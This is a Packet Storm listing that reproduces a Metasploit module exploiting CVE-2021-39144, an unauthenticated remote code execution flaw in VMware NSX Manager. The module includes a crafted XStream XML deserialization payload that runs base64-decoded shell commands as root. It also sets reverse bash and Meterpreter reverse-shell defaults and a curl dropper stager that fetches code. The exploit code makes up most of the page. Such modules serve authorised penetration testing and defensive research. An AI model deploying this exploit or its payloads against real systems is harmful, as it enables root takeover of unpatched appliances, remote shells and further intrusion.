exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VMware NSX Manager XStream Unauthenticated Remote Code Execution

VMware NSX Manager XStream Unauthenticated Remote Code Execution
Posted Nov 15, 2022
Authored by mr_me, Sina Kheirkhah, h00die-gr3y | Site metasploit.com

VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance. VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to remote command injection. This Metasploit module exploits the vulnerability to upload and execute payloads gaining root privileges.

tags | exploit, remote, root, code execution
advisories | CVE-2021-39144
SHA-256 | e1f5fa59aee9a79145c46b8829a1543dbca23d36d00d330dacc1326a5f871b45

VMware NSX Manager XStream Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware NSX Manager XStream unauthenticated RCE',
'Description' => %q{
VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
a malicious actor can get remote code execution in the context of 'root' on the appliance.
VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
are vulnerable to Remote Command Injection.

This module exploits the vulnerability to upload and execute payloads gaining root privileges.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die-gr3y', # metasploit module author
'Sina Kheirkhah', # Security researcher (Source Incite)
'Steven Seeley' # Security researcher (Source Incite)
],
'References' => [
['CVE', '2021-39144'],
['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],
['URL', 'https://kb.vmware.com/s/article/89809'],
['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],
['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']
],
'DisclosureDate' => '2022-10-25',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Unix (In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :in_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'curl', 'printf' ],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
end

def check_nsx_v_mgr
return send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login.jsp')
})
rescue StandardError => e
elog("#{peer} - Communication error occurred: #{e.message}", error: e)
fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
end

def execute_command(cmd, _opts = {})
b64 = Rex::Text.encode_base64(cmd)
random_uri = rand_text_alphanumeric(4..10)
xml_payload = <<~XML
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>bash</string>
<string>-c</string>
<string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
XML

return send_request_cgi({
'method' => 'PUT',
'ctype' => 'application/xml',
'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),
'data' => xml_payload
})
rescue StandardError => e
elog("#{peer} - Communication error occurred: #{e.message}", error: e)
fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
end

# Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"
# that indicates the target is running VMware NSX Manager (NSX-V)
# All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable
def check
print_status("Checking if #{peer} can be exploited.")
res = check_nsx_v_mgr
return CheckCode::Unknown('No response received from the target!') unless res

html = res.get_html_document
html_title = html.at('title')
if html_title.nil? || html_title.text != 'VMware Appliance Management'
return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')
end

CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')
end

def exploit
case target['Type']
when :in_memory
print_status("Executing #{target.name} with #{payload.encoded}")
execute_command(payload.encoded)
when :linux_dropper
print_status("Executing #{target.name}")
execute_cmdstager
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close